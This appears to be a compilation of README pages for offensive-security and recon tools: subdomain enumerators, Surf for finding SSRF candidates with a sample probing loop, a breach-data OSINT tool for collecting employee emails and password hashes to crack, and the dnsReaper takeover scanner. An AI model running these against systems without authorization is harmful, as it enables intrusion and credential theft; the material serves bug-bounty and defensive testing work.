This will install all the required modules and their respective versions.

Run the program using the following command:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
  url         Enter the site URL

options:
  -h, --help  show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thanks to my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

By: Zion3R


Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


Features

  • Perform subdomain enumeration using CIDR notation (Support input list).
  • Perform subdomain enumeration using ASN (Support input list).
  • Perform subdomain enumeration using a list of domains.

Installation

To install Nodesub, use the following command:

npm install -g nodesub

NOTE:

  • Edit File ~/.config/nodesub/config.ini

Usage

nodesub -h

This will display help for the tool. Here are all the switches it supports.

Examples
  • Enumerate subdomains for a single domain:

     nodesub -u example.com
  • Enumerate subdomains for a list of domains from a file:

     nodesub -l domains.txt
  • Perform subdomain enumeration using CIDR:

    node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

    node nodesub.js -c CIDR.txt -o subdomains.txt

  • Perform subdomain enumeration using ASN:

    node nodesub.js -a AS12345 -o subdomains.txt
    node nodesub.js -a ASN.txt -o subdomains.txt
  • Enable recursive subdomain enumeration and output the results to a JSON file:

     nodesub -u example.com -r -o output.json -f json

Output

The tool provides various output formats for the results, including:

  • Text (txt)
  • JSON (json)
  • CSV (csv)
  • PDF (pdf)

The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
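
Once surf has produced its candidate lists, trying them through a suspected SSRF point could look like the following sketch; the vulnerable URL, parameter, and file name are placeholders, not part of surf:

# Hypothetical follow-up: feed surf's external candidates into an SSRF-able
# parameter and watch for status codes that differ from the baseline
while read -r host; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.example/fetch?url=http://$host/")
    echo "$code $host"
done < external-candidates.txt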


Installation

This tool requires Go 1.19 or above, as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
  --hosts FILE, -l FILE
                        List of assets (hosts or subdomains)
  --concurrency CONCURRENCY, -c CONCURRENCY
                        Threads (passed down to httpx) [default: 100]
  --timeout SECONDS, -t SECONDS
                        Timeout in seconds (passed down to httpx) [default: 3]
  --retries RETRIES, -r RETRIES
                        Retries on failure (passed down to httpx) [default: 2]
  --disablehttpx, -x    Disable httpx and only output list of hosts that resolve to an internal IP address [default: false]
  --disableanalysis, -d
                        Disable analysis and only output list of hosts [default: false]
  --help, -h            display this help and exit

Output

When running surf, it will print the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

By: Zion3R


Columbus Project is an API-first subdomain discovery service: a blazingly fast subdomain enumeration service with advanced features.

Columbus returned 638 subdomains of tesla.com in 0.231 sec.


Usage

By default, Columbus returns only the subdomains, as a JSON string array:

curl 'https://columbus.elmasy.com/lookup/github.com'
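
If you have jq available, the same array can be flattened to one subdomain per line:

curl -s 'https://columbus.elmasy.com/lookup/github.com' | jq -r '.[]'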

But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.

DOMAIN="github.com"

curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
    if [[ "$SUB" == "" ]]
    then
        HOST="$DOMAIN"
    else
        HOST="${SUB}.${DOMAIN}"
    fi
    echo "$HOST"
done

For more, check the features or the API documentation.

Entries

Currently, entries are obtained from Certificate Transparency logs.

Command Line

Usage of columbus-server:
  -check
        Check for updates.
  -config string
        Path to the config file.
  -version
        Print version information.

-check: Check the latest version on GitHub. Prints up-to-date and returns 0 if no update is required. Prints the latest tag (e.g. v0.9.1) and returns 1 if a new release is available. In case of error, prints the error message and returns 2.

Build

git clone https://github.com/elmasy-com/columbus-server
make build

Install

Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (e.g. /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want Columbus to start automatically:

systemctl enable columbus-server


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, Sublist3r, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bug bounty programs that were collected by chaos.projectdiscovery.io and bounty-targets-data, or that just had responsible disclosure programs - 4095 domains in total! If a subdomain appears in more than 5-10 different scopes, it is put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less.

You can find the complete list of sources here.

Lists

Subdomains

In these lists you will find the most popular subdomains as-is.

Name                     Words count  Size
subdomains.txt.gz        21901389     501MB
subdomains_top100.txt    100          706B
subdomains_top1000.txt   1000         7.2KB
subdomains_top10000.txt  10000        70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains, split by levels. For example, the dev.stg subdomain will be split into two words, dev and stg; dev will have level = 2 and stg level = 1. You can use these wordlists for combinatory attacks in subdomain searches (see the sketch after the table below). There are several types of level.txt wordlists that follow the idea of subdomains.

Name                 Words count  Size
level_1.txt.gz       8096054      153MB
level_2.txt.gz       7556074      106MB
level_3.txt.gz       1490999      18MB
level_4.txt.gz       205969       3.2MB
level_5.txt.gz       71716        849KB
level_1_top100.txt   100          633B
level_1_top1000.txt  1000         6.6KB
level_2_top100.txt   100          550B
level_2_top1000.txt  1000         5.6KB
level_3_top100.txt   100          531B
level_3_top1000.txt  1000         5.1KB
level_4_top100.txt   100          525B
level_4_top1000.txt  1000         5.0KB
level_5_top100.txt   100          449B
level_5_top1000.txt  1000         5.0KB
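
For example, a quick combinatory pass could stitch the top level-2 and level-1 words together into candidate subdomains for a target (a plain loop for illustration; a dedicated resolver such as shuffledns or puredns would be far faster for the actual resolution step):

# Sketch: combine level-2 and level-1 words into candidate subdomains
DOMAIN="example.com"
while read -r w2; do
    while read -r w1; do
        echo "${w2}.${w1}.${DOMAIN}"
    done < level_1_top100.txt
done < level_2_top100.txt > candidates.txt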

Popular split subdomains

In these lists, you will find the most popular split words from subdomains on all levels. For example, the dev.stg subdomain will be split into two words, dev and stg.

Name                Words count  Size
words.txt.gz        17229401     278MB
words_top100.txt    100          597B
words_top1000.txt   1000         5.5KB
words_top10000.txt  10000        62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



D4TA-HUNTER - GUI Osint Framework With Kali Linux


D4TA-HUNTER is a tool created to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.

In addition, the "search company" section lets you insert a company's domain to find employee emails, subdomains, and server IPs.


GET API KEY

Register on https://rapidapi.com/rohan-patra/api/breachdirectory

Install

git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh

The application launcher requires several components to be installed; it will check them one by one, and for any component that is not installed it will show you the command you must run to install it:



Use

First, you must have a free or paid API key from BreachDirectory.org; if you don't have one and run a search, D4TA-HUNTER provides a guide on how to get one.

Once you have the API key, you will be able to search for emails, with the advantage of a list of all the password hashes ready for you to copy and paste into one of the online resources D4TA-HUNTER provides to crack passwords, 100% free.



You can also insert a company's domain, and D4TA-HUNTER will search for employee emails and subdomains that may be of interest, together with IPs of machines found:



Apis and tools

Service              Functions                      Status
BreachDirectory.org  Email, phone or nick leaks     βœ… (free plan)
TheHarvester         Domains and emails of company  βœ… Free
Kalitorify           Tor search                     βœ… Free


Video Demo: https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan

DISCLAIMER

This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing it in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!




dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!
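
A minimal pipeline step might look like the following sketch (the file name is an example; --pipeline makes DNS Reaper exit non-zero when a takeover is detected, which fails the job):

# Hypothetical CI step: block the deployment if any planned domain is vulnerable
docker run -v "$(pwd):/etc/dnsreaper" punksecurity/dnsreaper \
    file --filename /etc/dnsreaper/planned-domains.txt --pipeline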

Usage

To run DNS Reaper, you can use the docker image or run it with Python 3.10.

Findings are returned in the output, and more detail is provided in a local "results.csv" file. We also support JSON output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

          ____              __   _____                      _ __
/ __ \__ ______ / /__/ ___/___ _______ _______(_) /___ __
/ /_/ / / / / __ \/ //_/\__ \/ _ \/ ___/ / / / ___/ / __/ / / /
/ ____/ /_/ / / / / ,< ___/ / __/ /__/ /_/ / / / / /_/ /_/ /
/_/ \__,_/_/ /_/_/|_|/____/\___/\___/\__,_/_/ /_/\__/\__, /
PRESENTS /____/
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
  .\main.py provider [options]

output:
  findings output to screen and (by default) results.csv

help:
  .\main.py --help

providers:
  > aws          - Scan multiple domains by fetching them from AWS Route53
  > azure        - Scan multiple domains by fetching them from Azure DNS services
  > bind         - Read domains from a dns BIND zone file, or path to multiple
  > cloudflare   - Scan multiple domains by fetching them from Cloudflare
  > file         - Read domains from a file, one per line
  > single       - Scan a single domain by providing a domain on the commandline
  > zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
  {aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
  -h, --help            Show this help message and exit
  --out OUT             Output file (default: results) - use 'stdout' to stream out
  --out-format {csv,json}
  --resolver RESOLVER   Provide a custom DNS resolver (or multiple separated by commas)
  --parallelism PARALLELISM
                        Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
  --disable-probable    Do not check for probable conditions
  --enable-unlikely     Check for more conditions, but with a high false positive rate
  --signature SIGNATURE
                        Only scan with this signature (multiple accepted)
  --exclude-signature EXCLUDE_SIGNATURE
                        Do not scan with this signature (multiple accepted)
  --pipeline            Exit Non-Zero on detection (used to fail a pipeline)
  -v, --verbose         -v for verbose, -vv for extra verbose
  --nocolour            Turns off coloured text

aws:
  Scan multiple domains by fetching them from AWS Route53

  --aws-access-key-id AWS_ACCESS_KEY_ID
                        Optional
  --aws-access-key-secret AWS_ACCESS_KEY_SECRET
                        Optional

azure:
  Scan multiple domains by fetching them from Azure DNS services

  --az-subscription-id AZ_SUBSCRIPTION_ID
                        Required
  --az-tenant-id AZ_TENANT_ID
                        Required
  --az-client-id AZ_CLIENT_ID
                        Required
  --az-client-secret AZ_CLIENT_SECRET
                        Required

bind:
  Read domains from a dns BIND zone file, or path to multiple

  --bind-zone-file BIND_ZONE_FILE
                        Required

cloudflare:
  Scan multiple domains by fetching them from Cloudflare

  --cloudflare-token CLOUDFLARE_TOKEN
                        Required

file:
  Read domains from a file, one per line

  --filename FILENAME   Required

single:
  Scan a single domain by providing a domain on the commandline

  --domain DOMAIN       Required

zonetransfer:
  Scan multiple domains by fetching records via DNS zone transfer

  --zonetransfer-nameserver ZONETRANSFER_NAMESERVER
                        Required
  --zonetransfer-domain ZONETRANSFER_DOMAIN
                        Required

